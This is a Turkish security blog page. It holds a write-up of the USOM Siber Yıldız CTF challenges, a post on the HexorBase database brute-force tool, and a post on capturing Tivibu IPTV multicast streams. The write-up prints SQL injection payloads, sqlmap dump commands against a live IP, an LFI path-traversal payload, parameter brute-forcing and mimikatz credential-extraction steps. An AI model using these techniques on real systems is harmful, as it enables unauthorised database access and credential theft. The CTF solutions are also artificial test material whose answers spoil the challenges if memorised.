Kategori arşivi: Rehberler

Siber güvenlik rehberleri, güvenlik hakkında rehberler, sistem ve network rehberleri

Siberyildiz Soru ve Cevaplar

Merhaba arkadaşlar bilindiği gibi USOM aracılığı ile bir CTF düzenlendi ve bizde buna katılma ihtiyacı duyduk. Bizler ne etik hackerız nede bu alanda çalışıyoruz. Biz sadece programlama ve birtakım bilgiler ile CTF’ler de neler yapabileceğimize bakıyoruz.

CTF başladığında haliyle siteye girip soruları çözemedik bunda en büyük etken yarışma başladığında kurumun hiçbir şekilde Anti-ddos araçları ile siteyi korumamış olması ayrıca sistemin düzgün çalışmaması neyse her yerde olabilir vs deyip birkaç soruya girebildik ve çözmeye başladık

Ancak belirtmek istiyorum. Oldukça fazla bir şekilde cevap paylaşımı ve çoklu grup kafası yüzünden ciddi anlamda geçerliliği sorgulanması gerekiyor üstelik bu yarışma yaklaşık 6 Saat kadar bir süre saldırı kaynaklı kesintiye uğradı ve bizde dahil cevaplarımızı giremedik

Sisteme giriş yaptığımızda ise pek çok gurubun yüksek puanlara geçmiş olduğunu gördük. İnsanlarda haklı olarak twitter hesaplarından tepkide bulundular.

Soru 1

“İyi bak “ Bu soruda ilk olarak size bir adet resim veriyor ve bu resimden yola çıkarak cevabı bulmanız isteniyor. Resmi google aracılığı ile arattığımızda para ile alınmış olabileceğini düşündük ve biraz araştırma yaptık daha sonra basitten zora gidiyordur diye bi exiftool aracılığı ile comment ve copyright baktık ama soruda “iyi bak” dediği için daha sonrasında resme odaklandık

soru1siberyildiz

Her neyse resmin boş olduğunu anladıktan sonra curl atıp bakalım dedik birde ne görelim FLAG olarak orada bulunuyordu

soru1cevap
335286429afb2a2344079fe68764a1e0

Soru 2

“Bakalım ne kadar iyisin?” Bu soruda ise basit bir login ekranı geliyor karşımıza ne kadar iyisin diyor sonrada bize ilk başta ekip olarak biz bi xss ya da sql inj deneriz çünkü basitten zora gitmek gerekir biraz kurcaladıktan sonra altta yazan mesaja odaklandık kullanıcı adını bulmamız bu sayede zor olmadı 🙂

soru2siberyildiz

Kullanıcı adı: Yonetici

Şifre: 1’or’1’=’1

Olarak sisteme giriş yaptık cevabı deli gibi sitede aradık hatta giriş yaptın bölümündeki değerleri deneyen arkadaşlarımız bile oldu bu soruyu uzun süre yapamadık siteye yapılan ddos saldırıları ve kesintiler aslında bu konuda başımızı baya ağrıttı kimi zaman soruların alanlarına da ulaşamadık her neyse

Burp suiteyi browser ile beraber çalışacak hale getirin( burp suite -> Proxy -> Options(burada 127.0.0.1:8080 var ve tikli ise)
browser(iceweasel) -> preferences -> advanced options -> Connection -> Manual Proxy Connection HTTP Proxy 127.0.0.1 Port 8080 yapın kaydedin.

Burpta intercept off olarak ayarlayın.
Iceweaselda açın.

Sayfa yüklendikten sonra burpta intercept ON yapın.

Kullanıcı adı: Yonetici

Şifre: ‘or ‘1’=’1

Olarak yollayın.

Burp RAW sekmesinde bir post data yakalamış olacaktır.


POST /fc00914149de9f33c30cf0164ec4db95/ HTTP/1.1
Host: 85.111.95.37
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 
Cookie: PHPSESSID=h2041ov1n3ukbfqjmlc0pu7657
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

kullaniciadi=Yonetici&parola=%27or%271%27%3D%271

Ve bu datayı kopyalayın sql2.txt olarak Root Home içersine kayıt edin. Yeni terminal açın sqlmap -r sql2.txt -p parola //yazın password kısımının sql injectiona açık olduğunu bulacaktır. Çıkan sorulara yes deyin database in mySQL olduğunu bulacaktır. Olaylar buradan sonra başlayacak

database adını bulacaksınız. 2 adet database buluyor teki information_sc bunu geçin klasik hepsinde olan diğerdir diğeri ise bizim aradığımız

Adı: web2

sqlmap -u "http://85.111.95.37/fc00914149de9f33c30cf0164ec4db95" --data="kullaniciadi=Yonetici&parola='or '1'='1" --dbs

Tabloları çekmek için

sqlmap -u "http://85.111.95.37/fc00914149de9f33c30cf0164ec4db95" --data="kullaniciadi=Yonetici&parola='or '1'='1" --tables -D web2

kullanicilar diye tek bir tablo bulucak.

Kolonları çekmek için

sqlmap -u "http://85.111.95.37/fc00914149de9f33c30cf0164ec4db95" --data="kullaniciadi=Yonetici&parola='or '1'='1" --columns-D web2 -T kullanicilar

Bunun sonucunda aşağıdaki gibi bir sonuç çıkacak

id int(255)
kullaniciadi varchar(255)
parola int(255)

Kolonlardaki verileri çekmek için

sqlmap -u "http://85.111.95.37/fc00914149de9f33c30cf0164ec4db95" --data="kullaniciadi=Yonetici&parola='or '1'='1" --dump -D web2 -T kullanicilar

2 adet Kullanıcı bulucak teki Yonetici diğerinin adı “FLAG:” FLAG kullanıcısının parolası

f4aa0edc033b9dfcc676c33420996789

Kaynak: Alpcan ONARAN


Soru 3

Yetkili bir kullanıcı ile giriş yapman lazım. Sorusuna gelelim bu soruda ise sistemde zaten hali hazırda giriş yapmış olduğumuzu biliyoruz. Ancak bize daha yetkilisini bulmamızı söylüyor. Ve sayfa ilk giriş yaptığımızda bize çerez olarak

isAdmin=cfcd208495d565ef66e7dff9f98764da

Yukarıdaki yükleniyor hemen ardından ise çıkış yaptığımızda bu değeri sistemden siliyor. Biz bu değeri bir decode edelim dedik karşımıza 0 çıktı cevap haliyle bu olamazdı


Soru 4

“Elimizde bir flash bellek var, içerisindeki resimlerden biri bize lazım.” adlı sorumuza geldi sıra buradada bize verdiği dosya sözde bir disk imajı

ef2a36ae56f254dd6adf716dffc84264: DOS/MBR boot sector, code offset 0x52+2, OEM-ID "NTFS    ", sectors/cluster 8, Media descriptor 0xf8, sectors/track 62, heads 247, hidden sectors 2048, dos < 4.0 BootSector (0x80), FAT (1Y bit by descriptor); NTFS, sectors/track 62, sectors 102399, $MFT start cluster 4, $MFTMirror start cluster 6399, bytes/RecordSegment 2^(-1*246), clusters/index block 1, serial number 013e61d99342ea2e1; contains Microsoft Windows XP/VISTA bootloader BOOTMGR

Buraya kadar herşey normal şimdi sıra dosyaya binwalk ile bakmaya içerisinde neyin olup bittiğini görebileceğiz bu sayede

binwalk ef2a36ae56f254dd6adf716dffc84264 > dump.txt

Dosya içerisinde birden fazla PDF ve Resim olduğunu görüyoruz. Şimdi bunları dd ile tek tek çıkartmaya geldi

dd if=ef2a36ae56f254dd6adf716dffc84264 of=new.jpeg skip=14433399 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new2.jpeg skip=14516838 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new3.jpeg skip=28406368 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new4.jpeg skip=29052314 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new5.jpeg skip=29241403 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new6.jpeg skip=33026056 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new7.jpeg skip=33062920 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new8.jpeg skip=33062950 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new9.tiff skip=33062950 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new0.jpeg skip=45166530 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new11.jpeg skip=49163867 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new12.jpeg skip=49279925 bs=1

Çıkarttığımız resimler içerisinde benim dikkatimi en fazla çeken usomun logosunun bulunduğu ve resim headeri bozuk olandı

Herhangi bir hex aracı ile resmi açıyorsunuz ve header bilgisini düzeltiyorsunuz uzun uzun anlatmayacağım mantığını şu site aracılığı ile öğrenebilirsiniz. Rebuilding an Image Header

Daha sonra resmi düzelttikten hemen sonra herhangi bir exif aracı ile ki ben “exiftool” seçtim bilgilere bakıyoruz.

mertcan@0x2e88ce4:~/Desktop$ exiftool exifusom.png
ExifTool Version Number         : 10.37
File Name                       : exifusom.png
Directory                       : .
File Size                       : 87 kB
File Modification Date/Time     : 2017:01:21 14:23:12+03:00
File Access Date/Time           : 2017:01:21 14:23:20+03:00
File Inode Change Date/Time     : 2017:01:21 14:23:26+03:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 962
Image Height                    : 421
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Exif Byte Order                 : Little-endian (Intel, II)
Copyright                       : D0sy4kurt4rmA_B1ziM-1$iM1Z
Thumbnail Offset                : 94
Thumbnail Length                : 3755
Pixels Per Unit X               : 11811
Pixels Per Unit Y               : 11811
Pixel Units                     : meters
Software                        : Adobe ImageReady
Warning                         : Truncated PNG image
Image Size                      : 962x421
Megapixels                      : 0.405
Thumbnail Image                 : (Binary data 3755 bytes, use -b option to extract)

Ve sonunda bayrağımıza ulaştık

Copyright                       : D0sy4kurt4rmA_B1ziM-1$iM1Z

Değerin md5 hash halini alıyoruz ve işlemimiz burada bitiyor.

0679ce1ac69b580a695fc8308bfd2116

Soru 5

“Parolayı bul ve bize gönder !” başlıklı bu soruda ise bize site içerisinde kaynakta gözükecek şekilde obfuscate edilmiş yani karıştırılmış bir JS kodu verilmiş ve bizden bunu çözmemiz isteniyor. İlk olarak kodu düzeltelim

$(document)['ready'](function() {
    $('#loginform')['submit'](function(_0x34b0x1) {
        _0x34b0x1['preventDefault']();
        var _0x34b0x2 = true;
        var _0x34b0x3 = $('input[name="username"]')['val']();
        var _0x34b0x4 = $('input[name="password"]')['val']();
        var _0x34b0x5 = new Array('b5', '1c44', 'c6', '24c1', 'e6', '2b93', 'da', '1fd4', 'b1');
        if (CryptoJS.MD5(_0x34b0x3).toString() === '2dfa843b02427819d8bdf8271bb84a3c' && _0x34b0x4['length'] === (18 / 3 + 6 - 3)) {
            for (i = 0; i < _0x34b0x3['length']; i++) {
                if (i % 2 === 0) {
                    if (((_0x34b0x3['charAt'](i)['charCodeAt'](0)) + (_0x34b0x4['charAt'](i)['charCodeAt'](0))).toString(16) !== _0x34b0x5[i]) {
                        _0x34b0x2 = false;
                        break;
                    }
                } else {
                    if (_0x34b0x5[i] !== ((_0x34b0x3['charAt'](i)['charCodeAt'](0)) * (_0x34b0x4['charAt'](i)['charCodeAt'](0))).toString(16)) {
                        _0x34b0x2 = false;
                        break;
                    }
                }
            };
            if (_0x34b0x2) {
                alert('Bau015Faru0131lu0131 iu015Flem')
            } else {
                alert('Hatalu0131 iu015Flem')
            };
        } else {
            alert('Kullanu0131cu0131 adu0131 veya u015Fifre yanlu0131u015F')
        };
    })
});

Şimdi bu düzelttiğimiz kodların içerisinde yukarıda bulunan ve benim dahil etmediğim bir var bulunuyor çünkü bunun içerisinde sadece kullanıcı adı bulunuyordu oda md5 formatında verilmişti.

2dfa843b02427819d8bdf8271bb84a3c

Şimdi burada belirlememiz gereken tek şey şifre idi koda baktığımızda kullanıcı adının uzunluğunun 8 şifrenin ise 9 olması gerektiği idi bunu attık kenara zaten kullanıcı adı “alpaslan” yani md5 değerinin çözülmüş hali idi

Şifreyi çözmek içinse şöyle bir yol izlendi

##Adım 1 -
_0x4831 HEX  > ASCII
"""
input[name="username"]
input[name="password"]
b5
1c44
c6
24c1
e6
2b93
da
1fd4
b1
2dfa843b02427819d8bdf8271bb84a3c
length
charCodeAt
charAt
Başarılı işlem
Hatalı işlem
Kullanıcı adı veya şix66re yanlış
submit
#loginform
ready
##Adım2
_0x4831[13] > MD5 Crack > alparslan

##Adım 3
_0x34b0x5  > HEX > Decimal
181
7236
198
9409
230
11155
218
8148
177

##Adım 4
alparslan > Stplit Keys > Char Code
97
108
112
97
114
115
108
97
110

##Adım 5
a-b OR a/b  > Char
181-97=84 T
7236/108= C
198-112=86 V
9409-97=97 a
230-114=116 t
11155/115=97 a
218-108=110 n
8148/97=84 T
177-110=67 C

Şifre olarak ise çözümlemeler sonucunda uzunluğu 9 olan bir şifre elde ettik TCVatanTC Ayrıca sayfanın title baktığımızda BS yazdığını da gördük yani alpaslan demek istediği Büyük Selçuklu olabilirdi yada bi s…. git diyerek küfür ediyo da olabilirdi ancak sonuca ulaşabilmiştir.

d66ab2522c55a041661ff6526c99c36d

Soru 6

“Holowy Conz den beklediğimiz mesaj geldi, acaba nedir ?” olarak karşımıza bir resim çıkıyor. Haliyle bu bir steghide sorusu zorlanacağımızı düşündüysek de 10 sn kadar bir süre aldı çözmemiz

soru6gorsel

Herhangi bir unhide sitesine giriyoruz ve resmi siteye yüklüyoruz. Bu iş için biz Image Steganography sitesini kullandık sonuç olarak bize aşağıdaki gibi bir çıktı geldi ve hemen bir barkod okuyucu ile cevabı aldık

soru6cevap

ve sonuç olarak kare barkod da “siberstar” çıktı bunun md5 değerini alıyoruz.

0b6f6a0a8520da0839e5e3075df924fa

Ancak haliyle cevap bu değil daha sonra biz düşündük ki Hackerın oğlu adlı CTF de bulduğumuz bir değer vardı google ve github araması yaparak bayrağa ulaşmıştık bu tarz bir soru olabileceğini düşündük ve direk olarak google aramalarına başladık

İlk olarak

  • github
  • gitlab
  • bitbucket
  • facebook
  • twitter

Derken twitter’da bir adet hesap çıktı karşımıza ve siber starımı arıyorsun? yazıyordu altında da ilginç ve bol aa içeren bir mesaj,

Daha sonra google araması yapmaya devam ettik bu neyin şifrelemesiydi yada neyi işaret ediyordu diye soru steg sorusu olduğu için googlede Twitter Steganography olarak arama yaptık karşımıza java ile yazılmış bir adet tool ve online bu işlemin yapılabileceği bir web sitesi çıktı direk olarak kopyala yapıştır yaptıktan sonra IRC kanalını işaret ediyordu haliyle bayrağı buradan elde ettik.


Soru 7

Algoritmada ne kadar hizlisin ? Bu soruda bize sıralı bir dizi vermiş ve bizden sıralı olarak gidenleri bulmamızı istiyor.

Bir silsileden(sequence) sifir yada daha fazla eleman atilarak elde edilen silsileye alt silsile denir. Alt silsileler arasinda silsile elemanlari sirali olanlara sirali alt silsile denir. Ornegin (1,5,6,3,4,2,9,10,11) silsilesinden elden edilen (1,5) ve (2,9,10) birer sirali alt silsiledir. Ayni zamanda (2,9,10,11) silsilesi en fazla uyeye sahip sirali alt silsiledir. Buna gore asagida elemanlari onaltilik (hexadecimal) sayi sisteminde verilen silsilenin en fazla elemana sahip sirali alt silsilesi nedir.

Not: Cevap (1,25,216) formatinda (bosluksuz,virgullu ve parantezli) olmalidir. Elemanlar onluk (decimal) sayi sisteminde olmalidir.

Soru Silsilesi:
(0x9a,0x85,0x9e,0xac,0xaa,0xc4,0xa4,0xbb,0xbe,0x9a,0x64,0x9e,0x8e,0x9b,0x70,0xb4,0x81,0xa3,0x81,0x9b,0x9c,0x68,0x68,0x8b,0x6b,0x83,0x70,0x81,0xb2,0xb9,0x75,0xa7,0xb2,0x98,0x7a,0x90,0x92,0xc0,0xbf,0x64,0x75,0x68,0x7a,0xc5,0xa2,0xaa,0xab,0xc4,0x78,0x6c,0xab,0xbb,0xb5,0x7c,0x95,0xa4,0xb2,0x73,0x84,0xa0,0x88,0x96,0x72,0x8d,0xac,0x85,0xa7,0xad,0x82,0x9d,0xab,0x99,0x7c,0x72,0x6d,0x6b,0x8c,0x8a,0xa7,0x7d,0x68,0x86,0xaf,0xbb,0x79,0x83,0x8c,0x7b,0x72,0xb2,0x6f,0x77,0xb6,0xb8,0xf4,0xF6,0x8c,0x67,0xb6,0xb5)

Hex formatında verdiği içinde buna göre bazı işlemler yapmamız gerekiyordu haliyle

liste="0x9a,0x85,0x9e,0xac,0xaa,0xc4,0xa4,0xbb,0xbe,0x9a,0x64,0x9e,0x8e,0x9b,0x70,0xb4,0x81,0xa3,0x81,0x9b,0x9c,0x68,0x68,0x8b,0x6b,0x83,0x70,0x81,0xb2,0xb9,0x75,0xa7,0xb2,0x98,0x7a,0x90,0x92,0xc0,0xbf,0x64,0x75,0x68,0x7a,0xc5,0xa2,0xaa,0xab,0xc4,0x78,0x6c,0xab,0xbb,0xb5,0x7c,0x95,0xa4,0xb2,0x73,0x84,0xa0,0x88,0x96,0x72,0x8d,0xac,0x85,0xa7,0xad,0x82,0x9d,0xab,0x99,0x7c,0x72,0x6d,0x6b,0x8c,0x8a,0xa7,0x7d,0x68,0x86,0xaf,0xbb,0x79,0x83,0x8c,0x7b,0x72,0xb2,0x6f,0x77,0xb6,0xb8,0xf4,0xF6,0x8c,0x67,0xb6,0xb5"
for i in liste.split(","):
    print int(i,16)

Şeklinde kodumuzu yazdık ve dönüştürme işlemine geçtik okunabilir hale aşağıdaki gibi getirdik ve başladık içerisinde gözümüz ile aramaya

[154, 133, 158, 172, 170, 196, 164, 187, 190, 154, 100, 158, 142, 155, 112, 180, 129, 163, 129, 155, 156, 104, 104, 139
, 107, 131, 112, 129, 178, 185, 117, 167, 178, 152, 122, 144, 146, 192, 191, 100, 117, 104, 122, 197, 162, 170, 171, 19
6, 120, 108, 171, 187, 181, 124, 149, 164, 178, 115, 132, 160, 136, 150, 114, 141, 172, 133, 167, 173, 130, 157, 171, 1
53, 124, 114, 109, 107, 140, 138, 167, 125, 104, 134, 175, 187, 121, 131, 140, 123, 114, 178, 111, 119, 182, 184, 244,
246, 140, 103, 182, 181]

Baktığımızda bizden istediği şu olabilirdi.

(124,149,164,178)

veya

(111,119,182,184,244,246)

En uzun olanı seçiyoruz burada çünkü bize en uzun olanı soruyor. Oda ikinci bulduğumuz idi hemen md5 değerini alıyoruz.

ce549031ea58a4a7493dde46a2c71357

Soru 8

Splinter’ın bilgisayarından önemli veriler aldık, bunların ne olduğu bul ve bize bildir. Bu soruda ise bize bir adet ne olduğu belirsiz bir dosya veriyor ancak dosyayı sistemimize indirip file ile baktığımızda bunun bir pcap dosyası olduğunu görüyoruz.

içerisinde ise host tarafına bağlanan bir USB belleğin paketleri bulunuyordu. “URB_INTERRUPT” ve cihaz bilgisi vs şimdi burada yapmamız gereken bir kaç işlem var öncelikli olarak bunlara karar verelim.

tshark -r splinter -T fields -e usb.capdata > dump.txt

İşlemi yaptık bu işlemden sonra bize bir takım MAC adreslerine benzeyen ama cihaz hakkında bilgi sağladığını biliyorduk hemen googlede ufak bir arama yaptık ve bu konuda google CTF de bir makele bulduk aramak o kadarda uzun sürmedi daha sonra bunun usb bellek olmadığını bir fare olduğunu anladık bu bizim içinde bir ilk oldu forensic konusunda eksik olduğumuzuda haliyle anlamış olduk 🙂

awk -F: 'function comp(v){if(v>127)v-=256;return v}{x+=comp(strtonum("0x"$2));y+=comp(strtonum("0x"$3))}$1=="01"{print x,y}' dump.txt > sirali.txt
-1084 -79
-1084 -79
-1083 -80
-1083 -86
-1083 -89
-1083 -97

ve devam eden satırlar gördük sonra makaledede belirttiği gibi gnuplot kullanarak bir çizim elde ettik bu çizimde ise fareyi_buldum yazıyordu. Bu değeri MD5 olarak çevirdiğimizde ise cevabı elde etmiş olduk

a9930510d6923f409fcdba49f8280a3f

Kullandığımız makale ise Google CTF 2016 Forensic


Soru 9

Şimdi de uygulamanın kullandığı veritabanı parolası lazım Sorusuna geldik soruya geldiğimizde bizi ilk başta bi 404 hatası karşılıyordu. Çoğu kişi bu sayfanın gerçek olduğunu sanıp soru çalışmıyor diye twitterdan yazmaya başladı aslında olay CTRL + U bastığımızda sayfanın en altında gizlenmiş bir div içerisinde bulunan form ile gerçekleşiyordu F12 aracılığı ile tarayıcı tarafında style dosyasında bulunan değerleri kaldırdığınızda karşınıza 2 adet input ekranı geliyor haliyle buralar basittir diyip direk olarak admin yazdık ve içerdeydik veya jsfiddle gibi araçlar ile admin değeri ile post isteği attığınızda içeriye girebiliyorsunuz.

Her neyse karşımıza şu şekilde bir ekran geliyor ve aşağıda da ufak bir hata bulunuyordu ayrıca link yapısına baktığımızda bunun bir LFI olduğunu anlamak hiçte zor olmadı

soru9siberyildiz

Şimdi bu hata ışında biraz kurcalayalım. Bir kaç alt dizine inmemiz gerekiyor aslında çok değil hataya bakıldığında maximum 3 dizin aşağıya gitsek bu iş tamam bunun için ise biz şöyle bir payload seçtik

../db.php

linkimiz ise şu şekilde olacaktı

dd96a95ce40af42633d10802bd419bc5/sanayihirsizligi/index.php?file=..%2Fdb.php

urldecode ettiğinizde yukarıda vermiş olduğum payload olduğunu anlayabilirsiniz. Bu bilgiler ışığında oluşturduğumuz link ile girdiğimizde flag bir anda önümüze çıktı FLAG: Om3rHal1sD3MIR Bu değeride md5 formatına çevirdiğimizdede cevabımız tamamen hazırdı zaten

soru9cevap
0ae4ce5c35afcc6f88501b24f8498c0f

Soru 10

Bu görev önünde iki seçenek var : başarılı olursun veya olamazsın Bu soruda ilk olarak bi login kısmı geliyor burası basit zaten adam sana admin olarak gir diyor.

Kullanıcı adı: admin
Şifre: admin

Peki bundan sonra ne geliyor. Komutu çalıştıracak şifreyi bulmaya ve komutu çalıştırmaya komut zaten ls ancak komutu çalıştırmak için bizden bir adet şifre istiyor. Biraz uğraştıktan sonra elime geçen bir wordlist aracılığı ile get metodu kullanılan linke zorlama yaptık ve şifre karşımıza çıktı adminlele

9f0f364f34fc230630922d7c4ce66d68/cannotfindme/?pass[]=adminlele&cmd=ls

Giriş yaptıktan sonra ise içeride 3 adet dosya gözüküyor bize oda şöyle ki

index.php
readme.txt
try.html

Bunlar içerisinde readme.txt ve try.html gözümüze çarpıyor. kontrol ediyoruz. try.html dosyası içerisinde ise aşağıdaki satır yer alıyor.

read file /tmp/isThatFlag.txt

Tabi burada bazı arkadaşlar gidip dosyayı bulup okumak isteyeceklerdir. Ancak ana bizim girdiğimiz dosyanın adının try olduğunu göz önünde bulundurarak direk yukarıdaki değerin md5 halini aldık ve sonuç olumlu oldu

fc5b4590ba6b20619556c126d7aa101f

Soru 11

Yapabileceğine inancımız tam. Bu sorudada öncelikli olarak linki baya bi kurcaladık ne var ne yok diye bakma isteği duyduk sonra get isteği atmaya sql map ile denemeye başladık ilk olarak yüksek hızlı tarama işlemi yapınca site requestleri drop etmeye başladı bizde dedik bu böyle olmaz bir takım kısıtlamalar ile taramaya devam ettik şu şekilde bir URL elde ettik

index.php?id=1' UNION ALL SELECT NULL,CONCAT(0x716b626b71,0x756a64567375626642615a5042756b5551576d4345784d6e527a526545734a6c585a4a4745766175,0x71786b6271)-- mmYT--

Soru 12

Zararlı bir hacker’ın bilgisayarından veri elde ettik, içerisindeki hackerin şifresini bulabilir misin ?

Bu soruda bizlere bir dosya verilmişti.

  • Dosya ismi : usom-forensics

Bu gibi sorularda ilk olarak yapmamız gereken şey dosya hakkında bilgi almak için “file” komutunu kullanmaktır. Bizde bu soruda bu komu ile dosyayı incelediğimizde aşağıdaki gibi bir sonuç ile karşılaştık.

  • Komut: file usom-forensics
siber yıldız 2017 soru ve cevap, soru 12 çözüm

Bu bilgiden sonra “mv” komutu ile dosyanın uzantısını değiştiriyoruz.

  • Komut: mv usom-forensics usom-forensics.7z

Daha sonra “7za” aracı ile dosya içerisindeki veriyi çıkartıyoruz.

  • Komut: 7za e usom-forensics.7z
zip forensic, kali 7zip, siber yıldız cevaplar 2018

İçerisindeki veri tekrar file komutu ile incelendiğinde bir data olduğu bilgisini alıyoruz. Bu işlemden sonra volatility aracı ile incelemeye alıyoruz.

Bunun için ilk olarak image hakkında bilgi almak için aşağıdaki komutu kullanıyoruz.

  • Komut: volatility -f usom-forensics imageinfo
  • “-f”: incelenecek dosya tanımlanır.

RAM imajı analizi sorularında genelde ilk yapılması gereken şey, “pslist” komutu ile çalışan işlemleri listelemek ve sistemde o anda ki işleyiş hakkında bilgi sahibi olmaktır.

  • Komut: volatility -f usom-forensics –profile=Win7SP0x86 pslist
plist kali

Bu çıktı sonucunda dikkat çeken işlemler:

  • mspaint.exe
  • notepad.exe
  • lsass.exe

mspaint.exe dumpı alınıp gimp ile incelenip üzerine çalışılan resim üzerinden bilgi elde edilebilir. CTF lerde bu tarz sorular görüyoruz. Ancak böyle bir inceleme sonucunda aşağıdaki gibi bir sonuç ile karşılaştık.

flag değil, kali

Zaten bize sorulan şey bir parolaydı.

  • Soru: Zararlı bir hacker’ın bilgisayarından veri elde ettik, içerisindeki hackerin şifresini bulabilir misin ?

Bu nedenle volatility içerisinde kullanılabilen hashdump parametresi de denenebilirdi. Ancak burda da tatmin edici bir sonuç yoktu.

“pslist” dışında en çok işinize yarayacak bir diğer parametre “filescan” parametresidir.

Dosya üzerinde “filescan” çalıştırıldığında flag adı ile bazı dosyalar olduğu gözlemlenmiştir.

  • Komut: volatility -f usom-forensics –profile=Win7SP0x86 filescan
kali filescan

Bu veriler “dumpfiles” parametresi ile elde edilebiliyordu.

kali dumpfiles

Elde edilen bu verilerden flag.txt incelendiğinde lsass dump dosyasına ait bir link elde ediliyordu.

sorunun cevabı kali

Bu dump mimikatz ile incelendiğinde parola elde edilebiliyordu.

Adımlar:

  • privilege::debug
  • sekurlsa::minidump lsass
  • sekurlsa::logonPasswords
kali password, parola

Asıl Kaynak: Besim ALTINOK


Soru 13

Nedir bu sence ? Sorusunun ne olduğunu her ne kadar anlasak da cevaba ulaşamadık altın oran sorusu olup fibonacci ile rabbit seq arasında bir ilişki bulunmakta

Yardımlarından dolayı

  • Yasin YAMAN
  • Ömer İPEK
  • Yusuf GENÇ
  • Onur KOLAY
  • Furkan KALKAN
  • ve diğer tüm arkadaşlarıma teşekkürlerimi sunarım.

Birden Çok Veritabanı Sunucusunu Yönetme ve Denetleme

HexorBase, merkezi bir konumdan aynı anda birden çok veritabanı sunucusunu yönetmek ve denetlemek için tasarlanmış bir veritabanı uygulamasıdır; ortak veritabanı sunucularına (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL) karşı SQL sorguları ve kaba kuvvet saldırıları yapabilir.

haxorbase

Paket yönlendirmeyi, yerel alt ağlar içerisinde gizlenen uzaktan erişilemeyen sunucularla iletişim kurmak için proxy vekilleri için veya Metasploit için izin verir.

Gerekenler

  • python
  • python-qt4
  • cx_Oracle
  • python-mysqldb
  • python-psycopg2
  • python-pymssql
  • python-qscintilla2

Bağımlılıkların kurulması

sudo apt-get install python-qt4 python-mysqldb python-psycopg2 python-pymssql python-qscintilla2

cx_Oracle Kurulumu

pip install cx_Oracle

Uygulama Kurulum

wget https://github.com/savio-code/downloads/raw/master/hexorbase_1.0_all.deb
sudo dpkg -i hexorbase_1.0_all.deb

Uygulama her ne kadar eski olsa da oldukça işe yarıyor. Özellikle uzaktan yönetmek için hepsinin birleştirilmiş olması benim hoşuma gitti kaba kuvvet saldırıları gibi işler için kullanmanızı önermem ancak yönetim ve denetleme işleri için güzel

Tivibu Ev Yayınlarını Bilgisayar ve Telefonda Stream Etmek

Yasal uyarı: Bu blog yazısı eğitici amaçlarla yazılmıştır. Bu yazıdaki bilgilerin kötü amaçlarla kullanılmasından doğan zararlardan dolayı mesuliyet kabul etmiyorum.

Tivibu, Türkiye’de internet üzerinden veri akışıyla gerçekleşen Internet TV alanında yapılmış çalışmalardan birisidir. Tivibu ev, mobil ve bilgisayar gibi kullanım seçenekleri vardır.[1]
Bu anlatacağım yöntem için Tivibu Ev üyeliğinizin olması gerekmektedir.Çünkü Tivibu Ev, Tivibu’nun diğer platformlarının aksine IGMP adı verilen teknoloji kullanarak UDP Multicast Streaming ile çalışmaktadır.

Biraz Elimizi Kirletme Zamanı

Ağdaki IGMP paketlerini okumak için Wireshark yazği yazılımını kullanıyoruz. Çünkü Wireshark tüm trafik içerisinde IGMP paketlerini filtreleyebiliyor. Bunun için Wireshark’ı kullandığımız arayüzü dinleyecek şekilde başlatıp “Filter:” kısmına kısaca igmp yazmamız yeterli. Fakat gördüğünüz üzere bu karşımıza bir sürü IP adresi çıkıyor:

ExjelYz

Şuan izlediğimiz kanala ait multicast yayınını bulabilmek için öncelikle geri dönüş için kullanılan IPleri tahmin edip filtrelememiz gerekiyor.

  • Araştırmalarıma göre 224.x.x.x şeklindeki IP adresleri IGMP istekleri tarafından kullanılıyor (Yayın alma isteği ya da Yayından çıkma isteği) yani video verisi içermiyor. Bunları Filter: igmp and not ip.dst==224.0.0.0/8 ile filtreleyebiliriz.
J2szjCG
  • Kalan 239.x.x.x şeklindeki IP adresleri ise Multicast için atanmış IP adresleriymiş. Yani video verisi içeren adres bu iplerden biri olabilir.
  • Mantıken stream adreslerinin birbiri ardına gitmesi gerekiyor, mesela 239.x.x.1, 239.x.x.2, 239.x.x.3 gibi. Örnek tablomuza baktığımızda bize en yakın ip adresleri 239.254.0.x şeklindeki adreslerdir. Fakat henüz hangi IP’nin stream verisi içerdiğini bilmiyoruz.

Peki Hangisi ?

Bunu anlamanın tek yolu denemek. Buna göre 239.254.0.16:1234 adresi aradığımız adres. Voila !

ejEJ7GU

Ufak Düzeltmeler

Denemelerime göre RTP protokolü UDP’ye göre daha düzgün bir görüntü sunuyor fakat ne yazık ki her iki protokolde de aşırı hareketli görüntülerde görüntünün çizgi çizgi taranmış gibi gözükme problemi var. Bu problemiyse VLC -> Görüntü -> Taramasızlık -> Açık yolunu takip ederek çözdüm. Ayrıca işin güzel yanı televizyonda o kanal açık olmasa bile PC veya Telefonda o kanala ait akışı seyredebiliyorsunuz.

Yayın akışı Androidli tablet ve telefonlarda MX Player ile sorunsuzca izlenebilir.

Herkese iyi seyirler 🙂

Furkan KALKAN Tarafından yazılmıştır.


Not: Burada yazanlar teknik açıdan eksik ya da yanlış bilgiler içeriyor olabilir. Bu durumda lütfen alttaki yorum kutusunu kullanın.

OpenSSH Kritik Güvenlik Zafiyeti

